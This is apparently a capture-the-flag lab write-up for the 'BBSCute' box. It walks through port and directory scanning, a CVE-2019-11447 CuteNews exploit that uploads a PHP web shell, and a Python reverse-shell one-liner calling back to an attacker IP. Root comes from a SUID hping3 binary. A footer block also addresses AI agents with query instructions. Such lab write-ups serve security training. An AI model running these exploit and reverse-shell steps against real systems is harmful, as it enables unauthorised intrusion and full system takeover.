# BBSCute - Easy ## Enumeration ### Nmap ```bash ┌─[sheinn101@parrot]─[~/offsec/BBSCute] └──╼ [??]$ sudo nmap -sC -sV -oN nmap.out 192.168.129.128 Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-07 08:56 +0630 Nmap scan report for 192.168.129.128 Host is up (0.29s latency). Not shown: 995 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA) | 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA) |_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.38 (Debian) 88/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: 404 Not Found 110/tcp open pop3 Courier pop3d |_pop3-capabilities: STLS LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL TOP | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Subject Alternative Name: email:postmaster@example.com | Not valid before: 2020-09-17T16:28:06 |_Not valid after: 2021-09-17T16:28:06 |_ssl-date: TLS randomness does not represent time 995/tcp open ssl/pop3 Courier pop3d |_pop3-capabilities: TOP LOGIN-DELAY(10) PIPELINING USER IMPLEMENTATION(Courier Mail Server) UTF8(USER) UIDL |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US | Subject Alternative Name: email:postmaster@example.com | Not valid before: 2020-09-17T16:28:06 |_Not valid after: 2021-09-17T16:28:06 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.67 seconds ba ``` ### Directory Scanning ```bash ┌─[sheinn101@parrot]─[~/offsec/BBSCute] └──╼ [??]$ sudo dirsearch -u http://192.168.129.128 -w /opt/SecLists/Discovery/Web-Content/common.txt -r -t 60 --full-url _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 60 | Wordlist size: 4686 Output File: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/reports/192.168.129.128/_21-11-07_09-27-56.txt Error Log: /usr/local/lib/python3.9/dist-packages/dirsearch-0.4.1-py3.9.egg/dirsearch/logs/errors-21-11-07_09-27-56.log Target: http://192.168.129.128/ [09:27:57] Starting: [09:28:14] 301 - 317B - http://192.168.129.128/core -> http://192.168.129.128/core/ (Added to queue) [09:28:16] 301 - 317B - http://192.168.129.128/docs -> http://192.168.129.128/docs/ (Added to queue) [09:28:17] 200 - 1KB - http://192.168.129.128/favicon.ico [09:28:20] 200 - 10KB - http://192.168.129.128/index.html [09:28:20] 200 - 6KB - http://192.168.129.128/index.php [09:28:21] 301 - 317B - http://192.168.129.128/libs -> http://192.168.129.128/libs/ (Added to queue) [09:28:22] 301 - 319B - http://192.168.129.128/manual -> http://192.168.129.128/manual/ (Added to queue) [09:28:29] 403 - 280B - http://192.168.129.128/server-status [09:28:31] 301 - 318B - http://192.168.129.128/skins -> http://192.168.129.128/skins/ (Added to queue) [09:28:34] 301 - 320B - http://192.168.129.128/uploads -> http://192.168.129.128/uploads/ (Added to queue) [09:28:37] Starting: core/ [09:28:47] 301 - 325B - http://192.168.129.128/core/captcha -> http://192.168.129.128/core/captcha/ (Added to queue) [09:28:47] 301 - 326B - http://192.168.129.128/core/ckeditor -> http://192.168.129.128/core/ckeditor/ (Added to queue) [09:28:49] 301 - 320B - http://192.168.129.128/core/db -> http://192.168.129.128/core/db/ (Added to queue) [09:28:54] 301 - 326B - http://192.168.129.128/core/includes -> http://192.168.129.128/core/includes/ (Added to queue) [09:28:55] 200 - 0B - http://192.168.129.128/core/index.html [09:28:56] 301 - 322B - http://192.168.129.128/core/lang -> http://192.168.129.128/core/lang/ (Added to queue) [09:28:58] 301 - 325B - http://192.168.129.128/core/modules -> http://192.168.129.128/core/modules/ (Added to queue) [09:29:07] 301 - 323B - http://192.168.129.128/core/tools -> http://192.168.129.128/core/tools/ (Added to queue) ``` ### Web Default install page for `Apache` on Port `80` ![](/files/ZUgKkkkfjZpAMs4vvFUd) In `index.php` , We got a login page. ![](/files/GLR7LUwfh6ohxGityYxA) I tried default credentials and some sql injection but nothing work. So let's create a new users. ![](/files/QeLjO2NPHfIYPBzTebmN) As you see , we need `Captcha` to register account, but it's not load on the page. But in the source code, we can see `captcha.php` ![](/files/wux41JvavJOdaZ0Rnjty) When we click on that, we will get `captcha` text . ![](/files/i0rUwu4bdUx8S45DEljQ) We can use this `Captcha` to register accounts. ### Finding Exploit ![](/files/GSHD94vcE7n7YYMO4QdC) In the bottom of page, we can see that is running `Cutenews 2.1.2` , When I google about this and I found and exploit for this. > Clone this repo and run it. `python3 CVE-2019-11447.py http://IP/index.php` ``` ┌─[sheinn101@parrot]─[~/offsec/BBSCute/CVE-2019-11447-POC] └──╼ [??]$ python3 CVE-2019-11447.py shein shein http://192.168.129.128/index.php -.-. --- --- .-.. .... ....- -..- --- .-. -... .- -. -. . .-. [*] Detected version 'CuteNews 2.1.2' [*] Grabbing session cookie [*] Logging in as shein:shein [+] Login Success! [*] Grabbing __signature_key and __signature_dsi needed for pofile update request [+] __signature_key: eb376c517713a1ebc76154a292a7044f-shein [+] __signature_dsi: 7a551d498ea9f93dbe638fcfd9e71f34 [*] Uploading evil avatar... Done! [*] Validating that the file was uploaded... Yup! [+] http://192.168.129.128/uploads/avatar_shein_31095.php?cmd= [*] Looks like everything went smoothly, lets see if we have RCE! [*] Keep in mind that this shell is limited, no STDERR $> id uid=33(www-data) gid=33(www-data) groups=33(www-data) $> ``` ### Getting Reverse Shell Now we get a shell. To get a stable shell , Listen with `netcat` and run the following command ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.135",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' ``` ``` ┌─[sheinn101@parrot]─[~/offsec/BBSCute] └──╼ [??]$ rlwrap nc -nvlp 9001 listening on [any] 9001 ... connect to [192.168.49.135] from (UNKNOWN) [192.168.135.128] 35872 which python which python /usr/bin/python python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@cute:/var/www/html/uploads$ ``` Now we get a stable shell. As a easy box, let's find what binary has `SUID` bit is set. ### Privilege Escaplation ``` find / -perm -4000 2>/dev/null find / -perm -4000 2>/dev/null /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/su /usr/bin/pkexec /usr/bin/sudo /usr/bin/umount /usr/bin/newgrp /usr/bin/fusermount /usr/bin/passwd /usr/bin/mount /usr/sbin/hping3 /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device www-data@cute:/home/fox$ ``` We can see `hping3` has `SUID` bit. When we find `hping3` in [GTFObin](https://gtfobins.github.io/gtfobins/hping3/#sudo) and we can see like this, ![](/files/IDpslKZjWc45Ju0t75jm) `hping3` has already `SUID` bit and we don't need to add `sudo` . Run `hping3` and type `/bin/bash -p` ``` hping3 /bin/bash -p /bin/bash -p id; whoami id; whoami uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data) root bash-5.0# ``` Now we pwned it. ![](/files/UMswqkJjkI4wMFflqvdz) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l33t-en0ugh.gitbook.io/infosec/offensive-lab/bbscute-easy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.